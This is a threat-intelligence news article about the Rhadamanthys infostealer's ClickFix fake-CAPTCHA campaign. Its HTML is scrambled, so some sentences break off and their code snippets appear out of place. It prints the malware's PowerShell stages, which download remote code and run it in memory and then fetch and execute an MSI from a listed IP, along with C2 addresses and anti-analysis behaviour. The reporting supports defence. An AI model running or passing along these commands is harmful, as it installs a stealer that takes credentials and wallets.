Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating.<\/p>\n
At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to \u201cverify\u201d their session by pasting a PowerShell command.<\/p>\n
Once executed, the command silently reaches out to Dark Atlas analysts noted<\/a> that the lure pages are hosted on freshly registered typosquats, often imitating YouTube Partner Studio or similar SaaS portals, and that the underlying infrastructure has migrated from the earlier This subtle shift breaks hard-coded IoCs used by many security tools while preserving the stealer\u2019s delivery chain.<\/p>\n Campaign telemetry shows a significant uptick in infections across small-to-medium enterprises during June and early July 2025, with stolen browser cookies and cloud credentials appearing on dark-web<\/a> markets within hours of compromise.<\/p>\n What makes ClickFix especially potent is its social-engineering layer. The CAPTCHA screen offers a fake sense of legitimacy while precisely guiding the victim to press Win + R<\/em>, paste the command, and hit Enter<\/em>.<\/p>\n That single action bypasses traditional e-mail gateway filters and avoids the macros most blue teams hunt for.<\/p>\n By the time a user sees the reassuring \u201cVerification complete!\u201d pop-up, Rhadamanthys<\/a> has already unpacked in the background and begun siphoning data to its C2 at The initial PowerShell<\/a> command is heavily padded with hash symbols to evade string-based detectors, yet resolves into only two functional lines:-<\/p>\n Stage 1 lives only in memory; Stage 2 writes the MSI installer as The executable immediately enumerates running processes, hunting for debuggers such as It follows with time-based anti-sandbox checks using A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet files and KeePass vaults.<\/p>\n Screenshots captured via Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and encrypted TLS over port 443 blends seamlessly with normal traffic.<\/p>\n The ClickFix campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.<\/p>\n Updating signature-based rules to include execution-policy bypasses, monitoring child processes of Yet the broader lesson is behavioural: any \u201cverification\u201d prompt that asks users to run code is suspect\u2014especially when the only thing it fixes is the attacker\u2019s foothold.<\/p>\n Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions ->\u00a0Try ANY.RUN now<\/strong><\/a><\/p>\n The post Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nhxxps:\/\/ypp-studio[.]com\/update.txt<\/code>, turns off execution-policy safeguards and fetches the next-stage payload in memory\u2014completely fileless until the final drop.<\/p>\n77.239.96.51\/rh_0.9.0.exe<\/code> host to 62.60.226.74\/PTRFHDGS.msi<\/code>.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiDNiFfQvF9cBad3tmUUw5Vm3KQER5PkaXUy9SginSQnK1dpXgRH-6wGJt-ySpfxO2J9QZjIwhvLiGmu7bijr-5yaijYtp2zkOcEE0nNch5_ZVYEIEmOCAlMkJf6cyzEkh6DBtgGMfAAsW8r35UPzZNS-2SaY6oDc68Vrq0CDyY6aH30SAnkr8AsdrTgwE\/s16000\/Verification%2520complete%2520%28Source%2520-%2520Dark%2520Atlas%29.webp?ssl=1\")
193.109.85.136<\/code>.<\/p>\nInfection Mechanism<\/strong><\/h2>\n
# Stage 1 \u2013 clipboard payload\n$u='hxxps:\/\/ypp-studio[.]com\/update.txt'; (New-Object Net.WebClient).DownloadString($u) | iex\n# Stage 2 \u2013 decoded from Stage 1\nInvoke-WebRequest -Uri http:\/\/62.60.226.74\/PTRFHDGS.msi -OutFile $env:AppData+'PTRFHDGS.msi';\nStart-Process msiexec.exe -ArgumentList '\/i', $env:AppData+'PTRFHDGS.msi';<\/code><\/pre>\nPTRFHDGS.msi<\/code>, which drops rh_0.9.0.exe<\/code> and launches it with msiexec<\/code> so that parent\/child correlations appear benign.<\/p>\nx64dbg.exe<\/code>, ida64.exe<\/code>, or ProcessHacker.exe<\/code>; if found, it terminates itself to frustrate analysis.<\/p>\nQueryPerformanceCounter<\/code>, then injects into WerFault.exe<\/code>\u2014a trusted Windows Error Reporting binary\u2014to persist and exfiltrate.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgOUqG8adY3lQlfuce_r7vBJG-3HvBzvuHqFNJIizhOFmC-sruJAakISSgehyPJKzQ9BhOk5jTHeJq-ow4D8IwMFnelLjAVfO5SG52MUHPhkuwluwGGrdilVXl5G56KGeK-KjILsgtgcr7uAM0I9DBQN_YGlD029slhBc0LmarSPy7kCagha_cxRBasTjM\/s16000\/Capturing%2520screenshot%2520%28Source%2520-%2520Dark%2520Atlas%29.webp?ssl=1\")
BitBlt<\/code> are appended, giving operators a real-time window into victim activity.<\/p>\nmsiexec.exe<\/code>, and alerting on clipboard-sourced PowerShell are immediate steps defenders should consider.<\/p>\n